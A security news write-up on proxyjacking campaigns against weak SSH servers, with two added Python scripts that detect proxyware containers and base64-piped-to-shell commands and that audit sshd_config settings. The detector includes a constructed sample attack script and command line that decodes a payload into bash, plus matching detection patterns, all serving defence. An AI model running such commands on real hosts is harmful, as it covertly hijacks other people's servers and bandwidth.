Attackers have been observed running a series of proxyjacking attacks against vulnerable SSH servers, monetizing the compromised hosts through proxyware services that pay for shared, otherwise unused internet bandwidth.
The attackers use SSH for remote access and run malicious scripts that covertly enrol the victim servers in a peer-to-peer (P2P) proxy network such as Peer2Profit or Honeygain.
Diving into details
Akamai first detected the attacks on June 8, when numerous SSH connections were made to honeypots it operates.
After connecting to one of the vulnerable SSH servers, the attackers ran a Base64-encoded Bash script that enrolled the compromised system in the Honeygain or Peer2Profit proxy network.
The script also set up a container environment by pulling the proxyware vendors' Docker images, and killed any competing containers that were already sharing the host's bandwidth.
Further investigation of the compromised server turned up cryptocurrency miners, exploits and hacking tools, suggesting the threat actors have either moved fully to proxyjacking or added it as a second source of passive income.
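The chain described above (a Base64-encoded script handed straight to a shell, proxyware Docker images pulled, competing containers evicted) leaves host-side indicators a defender can look for. The script below is an added example, not code from the original page or from Akamai: it scans process command lines (one row of `ps -eo args` each) and `docker ps` output for those indicators. The proxyware image names come from the write-up; the sample process list, container table and the decoded script are constructed for illustration and are not captured from a real host.

```python
import base64
import binascii
import re

# Proxyware families named in the Akamai write-up. Matching is done on the image
# reference, so a container renamed by the attacker still trips the check.
PROXYWARE_IMAGE_PATTERNS = ("honeygain", "peer2profit")

# `... | base64 -d | bash` or `bash -c "$(echo ... | base64 -d)"`: either shape
# feeds decoded bytes to an interpreter without ever writing a script to disk.
B64_PIPE_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode)\b[^|]*\|\s*(?:/bin/)?(?:ba|z|da)?sh\b")
B64_SUBSTITUTION = re.compile(r"\$\([^)]*base64\s+(?:-d|--decode)[^)]*\)")
# A long run of base64 alphabet in a command line is worth trying to decode.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Competitor eviction: the script force-removes or kills containers it did not start.
CONTAINER_KILL = re.compile(r"docker\s+(?:rm\s+-f|kill|stop)\b")


def decode_embedded_base64(cmdline):
    """Return every decodable, mostly-printable base64 token in a command line as text."""
    decoded = []
    for token in B64_TOKEN.findall(cmdline):
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue  # not base64 after all (e.g. a hex digest or a long path)
        text = raw.decode("utf-8", errors="replace")
        printable = sum(1 for c in text if c.isprintable() or c.isspace())
        if printable / max(len(text), 1) > 0.9:
            decoded.append(text)
    return decoded


def scan_cmdline(cmdline):
    """Findings for one process command line."""
    findings = []
    if B64_PIPE_TO_SHELL.search(cmdline) or B64_SUBSTITUTION.search(cmdline):
        findings.append("base64 payload decoded straight into a shell")
    for payload in decode_embedded_base64(cmdline):
        low = payload.lower()
        hits = [p for p in PROXYWARE_IMAGE_PATTERNS if p in low]
        if hits:
            findings.append("decoded payload references proxyware: " + ", ".join(hits))
        if CONTAINER_KILL.search(payload):
            findings.append("decoded payload force-removes/kills containers")
    # The visible command line gets the same proxyware check as the hidden one.
    low = cmdline.lower()
    for p in PROXYWARE_IMAGE_PATTERNS:
        if p in low and "docker" in low:
            findings.append(f"docker invocation references proxyware image: {p}")
    return findings


def scan_docker_ps(output):
    """Findings from `docker ps --format '{{.ID}}\\t{{.Image}}\\t{{.Names}}'` output."""
    findings = []
    for line in output.splitlines():
        parts = line.split("\t")
        if len(parts) != 3:
            continue
        cid, image, name = parts
        for p in PROXYWARE_IMAGE_PATTERNS:
            if p in image.lower():
                findings.append(f"container {name} ({cid}) runs proxyware image {image}")
    return findings


# --- Constructed sample data (not from a real host) -------------------------
SAMPLE_SCRIPT = b"""#!/bin/bash
# evict a competing bandwidth-sharing container, then enrol this host
docker rm -f other-proxy-client >/dev/null 2>&1
docker pull honeygain/honeygain:latest
docker run -d --name hg honeygain/honeygain:latest
"""
ENCODED = base64.b64encode(SAMPLE_SCRIPT).decode()

SAMPLE_PROCESSES = [
    "sshd: alice [priv]",
    "/usr/bin/python3 /opt/app/server.py",
    "sh -c echo dGVzdA== | base64 -d > /tmp/k.bin",   # benign decode to a file
    f"sh -c echo {ENCODED} | base64 -d | bash",        # the attack shape
]
SAMPLE_DOCKER_PS = (
    "3f1c2a9b7d10\tnginx:1.25\tweb\n"
    "9ab4d2e71c03\thoneygain/honeygain:latest\thg\n"
)


def run_sample():
    per_process = {p: scan_cmdline(p) for p in SAMPLE_PROCESSES}
    return {
        "suspicious_processes": {p: f for p, f in per_process.items() if f},
        "containers": scan_docker_ps(SAMPLE_DOCKER_PS),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(run_sample(), indent=2))
```

The benign `base64 -d > file` line is deliberately not flagged: the signal is decoded bytes reaching an interpreter, not the use of base64 itself. On a live host the same two functions can be fed `ps -eo args` and `docker ps` output directly.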
Why it matters
Proxyjacking has emerged as a new way for cybercriminals to profit from compromised devices across both corporate and consumer environments.
It is a stealthier alternative to cryptojacking, since sharing bandwidth consumes far less CPU than mining and is correspondingly harder to notice, and it compounds the problem already posed by proxied Layer 7 attacks, because enrolled victims end up relaying other people's traffic.
Notable attacks against SSH servers
Recently, Microsoft disclosed an ongoing cryptomining campaign that hijacks SSH credentials on vulnerable Linux and Windows systems.
Last month, ASEC researchers uncovered a campaign distributing the Tsunami botnet to poorly managed SSH servers. Alongside Tsunami, the attackers deployed ShellBot, the XMRig miner and Log Cleaner to run DDoS and cryptomining operations.
The bottom line
Even as new ways of monetizing compromised hosts appear, old techniques keep working. Monetized proxyjacking is a prime example, and more schemes built around it are very likely to follow. Standard measures, such as strong passwords (or better, key-based authentication only), diligent patch management and comprehensive logging, remain effective defences.
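As an added example (not code from the page or from any of the vendors named in it), here is a check of the sshd settings those measures translate to: it parses the global section of an sshd_config and reports anything weaker than a hardened baseline. It goes one step beyond the "robust passwords" advice by treating password authentication itself as the weak setting, because key-only logins remove the brute-force surface the campaigns above depend on. The weak and hardened configs are constructed samples; the defaults table reflects sshd_config(5) for OpenSSH 7.0 and later.

```python
import re

WEAK_CONFIG = """\
# constructed sample of a loosely configured sshd_config
Port 22
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 10
LogLevel INFO
"""

HARDENED_CONFIG = """\
# constructed sample of the corrected settings
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
PermitEmptyPasswords no
MaxAuthTries 3
LogLevel VERBOSE
"""

# Values sshd applies when a keyword is absent (sshd_config(5)). An empty file
# is therefore already weak: password logins on, root login allowed with keys,
# six tries per connection, and no key fingerprints in the log.
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "permitemptypasswords": "no",
    "maxauthtries": "6",
    "loglevel": "INFO",
}


def parse_global_section(text):
    """Return {keyword: first value} for the part of the file before any Match block.

    sshd honours the first occurrence of a keyword, so later duplicates are
    ignored here as well. Per-Match overrides are out of scope for this check
    and are simply cut off at the first Match line."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # keywords may be separated from values by whitespace or a single '='
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break
        value = parts[1].strip() if len(parts) > 1 else ""
        settings.setdefault(key, value)
    return settings


def audit(text):
    """Return [(keyword, effective value, recommended value)] for every weak setting."""
    present = parse_global_section(text)
    effective = {k: present.get(k, default) for k, default in DEFAULTS.items()}
    weak = []
    if effective["passwordauthentication"].lower() != "no":
        weak.append(("PasswordAuthentication", effective["passwordauthentication"], "no"))
    if effective["permitrootlogin"].lower() != "no":
        weak.append(("PermitRootLogin", effective["permitrootlogin"], "no"))
    if effective["permitemptypasswords"].lower() != "no":
        weak.append(("PermitEmptyPasswords", effective["permitemptypasswords"], "no"))
    try:
        tries = int(effective["maxauthtries"])
    except ValueError:
        tries = 0  # unparsable value: flag it rather than trust it
    if tries < 1 or tries > 3:
        weak.append(("MaxAuthTries", effective["maxauthtries"], "3"))
    # VERBOSE logs the key fingerprint of each login; DEBUG levels are flagged too,
    # since sshd_config(5) warns they expose user data and are not for production.
    if effective["loglevel"].upper() != "VERBOSE":
        weak.append(("LogLevel", effective["loglevel"], "VERBOSE"))
    return weak


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit(cfg) or "ok")
```

Run it against `/etc/ssh/sshd_config` by reading the file into `audit()`; on hosts that use `Include` drop-in files or `Match` blocks, check those sections by hand, since this parser only covers the global section.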